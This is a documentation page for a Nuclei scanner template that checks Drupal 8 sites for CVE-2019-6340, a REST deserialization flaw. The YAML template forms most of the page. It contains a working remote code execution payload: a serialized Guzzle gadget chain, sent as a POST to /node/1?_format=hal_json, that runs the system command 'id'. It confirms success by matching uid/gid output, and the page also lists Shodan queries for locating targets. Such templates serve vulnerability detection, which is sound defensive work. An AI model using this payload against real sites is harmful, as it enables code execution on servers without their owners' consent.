Skip to content
Nuclei Templates

Drupal - Remote Code Execution

ID: CVE-2019-6340

Severity: high

Author: madrobot

Tags: cve,cve2019,drupal,rce,kev

Description

Section titled “Description”

Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.

YAML Source

Section titled “YAML Source”
id: CVE-2019-6340


info:
  name: Drupal - Remote Code Execution
  author: madrobot
  severity: high
  description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Drupal site.
  remediation: |
    Apply the official security patch provided by Drupal to fix the deserialization vulnerability.
  reference:
    - https://www.drupal.org/sa-core-2019-003
    - https://www.synology.com/security/advisory/Synology_SA_19_09
    - https://nvd.nist.gov/vuln/detail/CVE-2019-6340
    - https://www.exploit-db.com/exploits/46452/
    - https://github.com/CVEDB/PoC-List
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2019-6340
    cwe-id: CWE-502
    epss-score: 0.97451
    epss-percentile: 0.9995
    cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: drupal
    product: drupal
    shodan-query:
      - http.component:"drupal"
      - cpe:"cpe:2.3:a:drupal:drupal"
  tags: cve,cve2019,drupal,rce,kev


http:
  - method: POST
    path:
      - '{{BaseURL}}/node/1?_format=hal_json'


    body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "groups="
        condition: and


      - type: status
        status:
          - 200
# digest: 490a0046304402204aee1a2ae898f882a581490d8f88ec15e1669ee8925a362418f62ad67173bc3702201be1600d9bd651b34557181bebda7ab363f195a1bd07a045512a443b020fb1d1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-6340.yaml"

View on Github